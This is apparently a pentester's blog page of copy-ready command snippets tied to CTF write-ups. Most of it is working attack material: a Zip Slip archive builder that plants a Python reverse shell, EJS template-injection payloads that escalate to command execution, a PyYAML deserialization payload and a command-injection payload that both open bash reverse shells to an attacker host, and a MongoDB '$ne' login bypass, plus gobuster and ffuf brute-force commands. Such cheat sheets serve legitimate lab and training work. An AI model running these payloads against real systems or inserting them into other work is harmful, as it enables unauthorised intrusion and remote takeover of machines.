M4cCrypt0
cat ~/snippets/*.md

command snippets

// reusable, tested command templates — recon, web exploitation, privesc, pivoting, forensics. Copy, swap the <placeholders>, go.

Zip Slip Payload Builder

Craft a Zip Slip archive: a valid manifest to pass validation plus a ../ traversal entry that writes a payload outside the extraction directory.

python
# Vulnerable extractors join the archive filename onto the extract dir without
# normalising it, so a "../" entry escapes. Pair a valid manifest (to survive
# app-level checks) with the traversal payload.
import zipfile, json

manifest = {"name": "reverse", "assets": []}
callback = '''
import socket, os, pty
s = socket.socket(); s.connect(("<attacker-ip>", 4444))
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")
'''
with zipfile.ZipFile("reverse-shell.zip", "w") as z:
    z.writestr("shell.json", json.dumps(manifest))
    z.writestr("../../hooks/callback.py", callback)   # escapes the extract dir

used in: Zip Slip to RCE: The Hollow Shell

EJS SSTI — Probe to RCE

Server-side template injection in EJS: confirm with a 7*7 probe, escalate to execSync command execution, then stage a bigger payload via base64.

text
# Values below go into the injectable template field (e.g. template=...).

# 1) probe — a reflected "49" proves the input is evaluated as a template
<%= 7*7 %>

# 2) RCE — reach Node's child_process through the template engine
<%= process.mainModule.require("child_process").execSync("id") %>

# 3) stage a real payload without quoting hell: base64 shell.js locally
#    (base64 -w0 shell.js), then decode + pipe into node on the target
<%= process.mainModule.require("child_process").execSync("echo <BASE64> | base64 -d | node") %>

used in: Byte Lotus — Poolside (Boot2Root, Medium)

PyYAML Deserialization RCE

When an app calls yaml.load() on attacker input, the object/apply constructor executes arbitrary code — here a straight reverse shell.

yaml
# Send as the YAML value the app parses with an unsafe yaml.load().
# !!python/object/apply calls os.system with your argument on load.
playlist: !!python/object/apply:os.system ["bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1'"]

used in: TryHackMe Resort write-up

NoSQL Auth Bypass ($ne Operator Injection)

Bypass a login backed by MongoDB/NeDB by sending a query operator instead of a password value — the check becomes "password not equal to null".

bash
# JSON login that injects an operator into the password field.
# The backend runs db.findOne({ username, password }) — {"$ne": null} matches
# any stored password, so authentication succeeds without knowing it.
curl -s -X POST http://<target-ip>/login \
  -H "Content-Type: application/json" \
  -d '{"username":"<user>","password":{"$ne":null}}'

used in: Byte Lotus — Poolside (Boot2Root, Medium)

gobuster Directory Brute-Force

Threaded directory/file discovery with gobuster, with common extensions and output to a file. The Go alternative to ffuf/feroxbuster.

bash
gobuster dir -u http://<target-ip> \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -t 40 -x php,txt,html -o gobuster.txt

used in: Cheatsheet: tool overview

Command Injection → Detached Reverse Shell

OS command injection via an unsanitized parameter; setsid + input redirect detaches the reverse shell so it survives the HTTP response returning.

bash
# listener on your box
nc -lvnp 4444

# inject after ';' — setsid + < /dev/null & detaches the shell from the request,
# so it keeps running once the HTTP handler returns
curl -s -X POST http://<target-ip>/internal/netcheck \
  --data-urlencode "host=<attacker-ip>;setsid bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1' < /dev/null &"

used in: Byte Lotus: Infinity Pool — Two Shells, One Voicemail

ffuf Directory & Vhost Brute-Force

Content discovery with ffuf — directory fuzzing plus a vhost variant that filters on response size.

bash
# directory / file discovery
ffuf -u http://<target-ip>/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -mc 200,204,301,302,307,401,403 -o ffuf-dirs.json

# virtual-host discovery — filter out the default page by size (-fs)
ffuf -u http://<target-ip>/ -H "Host: FUZZ.<domain>" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs <default-response-size>